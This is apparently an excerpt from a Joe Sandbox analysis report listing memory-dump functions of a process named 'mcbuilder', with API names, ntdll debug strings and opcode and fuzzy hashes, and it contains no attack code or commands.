                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                                                • Instruction ID: dc1cfaa35dacf3f742b26777172c377790bb9841b8308b969a0d390386b711c5
                                                • Opcode Fuzzy Hash: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                                                • Instruction Fuzzy Hash: 2FE06D762003047BE614EE58DC40FDB33ACEFC9710F00440AFA18A7241D630B910CAB4
                                                Function 030B8FB0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(030A1886,?,030B4F8E,030A1886,030B4F6E,030B4F8E,?,030A1886,030B4F6E,00001000,?,?,00000000), ref: 030B8FEC
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                                                • Instruction ID: 26051c89fd9ae968346332df4bec98a0d5d4d339d1207a1bb5fec59cac98715b
                                                • Opcode Fuzzy Hash: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                                                • Instruction Fuzzy Hash: DFE06576204304BBEA14EE58DC40FDB33ECEFC9750F004019FA08AB241C670B9108AB9
                                                Function 030A8180 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 030A81AC
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 4a6ee6b496e1e6d6e7dc5a3cfe154c434e47f155942d25cc74983696e9c56501
                                                • Instruction ID: 13351503712c68a02005eda7a8d2570654e4693a06595f12f9a84b7d5766b00c
                                                • Opcode Fuzzy Hash: 4a6ee6b496e1e6d6e7dc5a3cfe154c434e47f155942d25cc74983696e9c56501
                                                • Instruction Fuzzy Hash: 79E0867524170427FB24FAECEC49FA6339D9B48664F1D8660F96CDB2C1E578F5014290
                                                Function 038D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c9a444739ec70fa53243310ca373b5d16f7fd83cd5e036f75b5a640a166fccd9
                                                • Instruction ID: f4365aa57f1018b18b3824f9fb1f835d5a503874304d825e0ea778486c4e1033
                                                • Opcode Fuzzy Hash: c9a444739ec70fa53243310ca373b5d16f7fd83cd5e036f75b5a640a166fccd9
                                                • Instruction Fuzzy Hash: 3BB09B719015C5D9DA11E7A0460871B7A0467D1701F29C4E1D3034641E4739C5D5E176

                                                Non-executed Functions

                                                Function 03BB04E8 Relevance: .2, Instructions: 165COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493514195.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3bb0000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b5e4d8e6f33e47aeaa4d935c6bdd578c04f06ce96fc5675625634e2ba80ae5e9
                                                • Instruction ID: 11fb38ad85edd2a9b53f007db825df3c41257425b9863af121a0f3b6db8cdc5a
                                                • Opcode Fuzzy Hash: b5e4d8e6f33e47aeaa4d935c6bdd578c04f06ce96fc5675625634e2ba80ae5e9
                                                • Instruction Fuzzy Hash: 2541C4B4618F095FD358EF68D0802BAB3F5FB89308F5005BDD496C7662EFB1E4528685
                                                Function 03BBDF9A Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493514195.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3bb0000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3558027158
                                                • Opcode ID: 8b6bfd9641ca40b967443cd7c311b4ddbb90ec83cbeed4ecbcb3944c76344322
                                                • Instruction ID: 9ba5094cb388976549d25f38c2b657f5b5f0650f442299960e80b9e7915613fb
                                                • Opcode Fuzzy Hash: 8b6bfd9641ca40b967443cd7c311b4ddbb90ec83cbeed4ecbcb3944c76344322
                                                • Instruction Fuzzy Hash: EC914EF04082988AC7158F55A0612AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB95
                                                Function 038D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 2c9fa848dcd93daf1e959a2008e89fb5c0535b112e58bec84ac553f3b28fa5f0
                                                • Instruction ID: 865e8fb32b7f4691b8d6695ff6da90f40ee8477736e9bd548a52ca85f0323807
                                                • Opcode Fuzzy Hash: 2c9fa848dcd93daf1e959a2008e89fb5c0535b112e58bec84ac553f3b28fa5f0
                                                • Instruction Fuzzy Hash: 2D51B9B6A0421ABFCB20DBDCC89097EF7B8BB49201B5486E9E4A5D7641D274DE50C7E0
                                                Function 03942410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 7851061a325920e0c9190828e2f428782b99a069088c712f0195669b2da6f1bf
                                                • Instruction ID: bc9e99965df7b6e24638550c5bc01d831b5a4a59fd285a98f6c6ec0c9eb46838
                                                • Opcode Fuzzy Hash: 7851061a325920e0c9190828e2f428782b99a069088c712f0195669b2da6f1bf
                                                • Instruction Fuzzy Hash: 665191A9A00645AECB20DB9CC890D7EB7BDEF44241B448CA9F4E6D7641E6B4EA408760
                                                Function 038C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03904725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03904742
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039046FC
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03904787
                                                • ExecuteOptions, xrefs: 039046A0
                                                • Execute=1, xrefs: 03904713
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03904655
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 90a11120ad330aa9316afc9daf16787f593caf79bbfd40cf61e6f51332de0cf5
                                                • Instruction ID: b4c47fe8fe21574fbbcf15eaac15ebff2b5246a519ea5bbab6dbf9bfd97cd0ba
                                                • Opcode Fuzzy Hash: 90a11120ad330aa9316afc9daf16787f593caf79bbfd40cf61e6f51332de0cf5
                                                • Instruction Fuzzy Hash: F0510535A1025D6EDB10EBE9DC89FAEB7A8AB44304F1400EDE605EB291EB70DA41CF51
                                                Function 03966940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: a4c03fd2df6be001dbe9d6212e2e6bf9aff9c5eb64ced1afed47ac71e8a1460e
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: DA024475509341AFC305CF68C890A6FBBE9EFC8744F448A6DF9898B264DB35E905CB42
                                                Function 038DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: d01c2ce8ee9bb35fcf6894762d342fc356de52d45cf271a8f2423c260eff7501
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: 40819D74E052499BDF26CEE8C8917BEBBB5AF45360F1E41D9D861E7390C7349840CB51
                                                Function 039420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 3b20a479cdd04fe023ad37aa7c66e5aaae220c4724062dea890ed4ce9188f539
                                                • Instruction ID: 0887ad1f266dca780235220ae09d0aa781667f2969da057a2f1730d0ed05f121
                                                • Opcode Fuzzy Hash: 3b20a479cdd04fe023ad37aa7c66e5aaae220c4724062dea890ed4ce9188f539
                                                • Instruction Fuzzy Hash: 1021367AA00219ABDB10DFA9D840DAFB7ECAF58644F480566F955D7200E770D901CBA1
                                                Function 038BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 0390031E
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039002E7
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039002BD
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 7efe7d6548420a30baa0942e9d0be7a417eef2200f3a1e23604de184d71f689c
                                                • Instruction ID: 3dfe56bd7707a4f65ff17d4d3c0fd7993ef1ea9344fd19a9718e2132b060c880
                                                • Opcode Fuzzy Hash: 7efe7d6548420a30baa0942e9d0be7a417eef2200f3a1e23604de184d71f689c
                                                • Instruction Fuzzy Hash: 2EE1AB306087429FD725CF68C884B6AB7F4BB89714F180AA9F6A5CB3E1D774D944CB42
                                                Function 038CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 03907B8E
                                                • RTL: Re-Waiting, xrefs: 03907BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03907B7F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 847cc7e9e10a4346d511c23bdf1256f1673f811cd3bed0ca3a2d0c4b2b16c185
                                                • Instruction ID: 8b2b92ce8a4b44f6adff2ae127dd89a5f46e6c6b62b4d8a728c19fa43bf86768
                                                • Opcode Fuzzy Hash: 847cc7e9e10a4346d511c23bdf1256f1673f811cd3bed0ca3a2d0c4b2b16c185
                                                • Instruction Fuzzy Hash: B6410335710B469FC725DEA8C841B6AB7E9EF88720F040A9DF85ADB780DB30E405CB91
                                                Function 038CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0390728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 039072A3
                                                • RTL: Re-Waiting, xrefs: 039072C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03907294
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 2b53cc9f06c6b4ebd8dc5a76d58f8c9d9c935009b76fb0794b0ef42285085b17
                                                • Instruction ID: 237e6247350f54123a368bad566fd3a99525d1e64ae85c0da68125d7d60911d5
                                                • Opcode Fuzzy Hash: 2b53cc9f06c6b4ebd8dc5a76d58f8c9d9c935009b76fb0794b0ef42285085b17
                                                • Instruction Fuzzy Hash: 6A41013560464AAFC721DEA8CC42B6AB7A9FF84724F140A58F855EB280DB30F852C7D1
                                                Function 03942300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 0bad0587b76c3d0c2db892e1ee30f0cd0e0a9af69e6e97c57c48425adf1418de
                                                • Instruction ID: 155c39814fbb38718fef8b9b3327c21a682a5259cdef4e3304f4f84c451bb50f
                                                • Opcode Fuzzy Hash: 0bad0587b76c3d0c2db892e1ee30f0cd0e0a9af69e6e97c57c48425adf1418de
                                                • Instruction Fuzzy Hash: 4E314876A006199FCB20DF69DC40FEEB7BCFB44650F444995F899E7240FB309A458B61
                                                Function 038D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: 9945df7f447d9d4f697d49602fc2137c58c7f38de12e0ba95bb45be5d1acf284
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: AD91A070E0021A9BDF34DEE9C881ABEF7A5EF44720F58459AF865EB2C4EB309940C751
                                                Function 03899126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 0e36a7d2369083d2b693ec9b8991d2ecc1f46cb67b90916a475708e37433d07f
                                                • Instruction ID: 213a6f5fdf597329f0ba604b433187bb2bd557d4512df48128b5709e92be04a5
                                                • Opcode Fuzzy Hash: 0e36a7d2369083d2b693ec9b8991d2ecc1f46cb67b90916a475708e37433d07f
                                                • Instruction Fuzzy Hash: A3813A75D002699BDB31DB94CC44BEEB7B8AB48710F0445EAEA19FB640D7349E84CFA1
                                                Function 03BB3B0E Relevance: 5.0, Strings: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493514195.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3bb0000_mcbuilder.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )$* -8$+6%<$`l()
                                                • API String ID: 0-647279220
                                                • Opcode ID: cee342b36fab161dcef5bef29b321cc704d75c31aeb95d9342c277f1f3756c3c
                                                • Instruction ID: f9ee39e31fd3db9cff17cbbb7fec2c1fa7c788130135810bfbcac87e7d49dea5
                                                • Opcode Fuzzy Hash: cee342b36fab161dcef5bef29b321cc704d75c31aeb95d9342c277f1f3756c3c
                                                • Instruction Fuzzy Hash: 44F0823511878457C704AB14C445696BBE1FB9830CF5016ADE48ADB251DE3A9616C78A